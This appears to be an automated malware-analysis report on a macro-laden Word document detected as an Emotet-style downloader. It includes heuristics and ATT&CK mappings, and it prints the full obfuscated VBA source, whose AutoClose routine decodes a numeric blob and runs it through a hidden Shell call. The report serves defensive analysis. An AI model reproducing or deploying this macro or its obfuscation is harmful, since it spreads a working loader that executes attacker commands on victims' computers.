MALICIOUS
244
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is an OOXML document containing VBA macros, specifically an Auto_Close macro that calls the Shell() function. This indicates an attempt to execute arbitrary commands, likely to download and run a secondary payload. ClamAV detection confirms this as Doc.Malware.Emooodldr-6711604-0.
Heuristics 6
-
ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2461 bytes |
SHA-256: 2df131f4297a1ec572b7bb77b0fe56aa20f230431f61f655c4c4cf23b57a2188 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function critico(serio As Integer) As String
Dim rullino() As Variant
rullino = Array(",", "l", "/", "$", "T", "W", "'", "1", "O", "D", "a", ":", "4", "n", "g", "m", "w", "c", "3", "?", "K", "C", "2", "N", "J", "-", ")", "\", "p", "8", "F", "i", "s", "S", ";", "r", "B", "u", "X", "v", " ", "d", "t", "o", "j", "y", "e", "E", "(", "P", "A", "x", "I", "=", "+", ".", "f", "h", "b")
Dim sfoderare As Integer
For sfoderare = LBound(rullino) To UBound(rullino)
If sfoderare = serio Then
critico = rullino(sfoderare)
End If
Next
End Function
Function chirurgo(monotono As String)
monotono = StrConv(monotono, vbUnicode)
chirurgo = Split(Left(monotono, Len(monotono) - 1), vbNullChar)
End Function
Function delirio(nordico As String) As String
Dim inter As Integer
Dim parola As String
Dim berlina As Variant
berlina = chirurgo(Trim(nordico))
For sfoderare = 0 To Len(nordico)
If (sfoderare + 1) <= UBound(berlina) Then
Dim malinteso As String
malinteso = berlina(sfoderare)
sfoderare = sfoderare + 1
malinteso = malinteso + berlina(sfoderare)
parola = parola + critico(Int(malinteso))
End If
Next
delirio = parola
End Function
Public Function rischio(scippo As String)
Shell scippo, 0
End Function
Sub AutoClose()
Call Application.Run("rischio", delirio("171541554651464002174028431646353257460101402547514617403645281032324025234349402521431515101341404823461625085844461742403345324246155523464255054658210131461342265509431613014310413031014648065742422811020210101341464614131046101345551743150213311343023237284635565515415606004003461339115049490950045040544006273620412455465146062634403342103542254935431746323240034613391150494909500450062736204124554651460634404823461625085844461742403345324246155523464255054658210131461342265509431613014310413342353113144806574242281102021010134146461413104610134555174315023255285728193141533237284635560626344052473848482346162508584446174240334532424615552346425505465821013146134226550943161301431041334235311314480657424228110202180755072912552218125507122902325528572806262634"))
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 11776 bytes |
SHA-256: e2410f65041192ecc581e34489054297f43981758fe2738868184e0bbddc349d |
|||
|
Detection
ClamAV:
Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.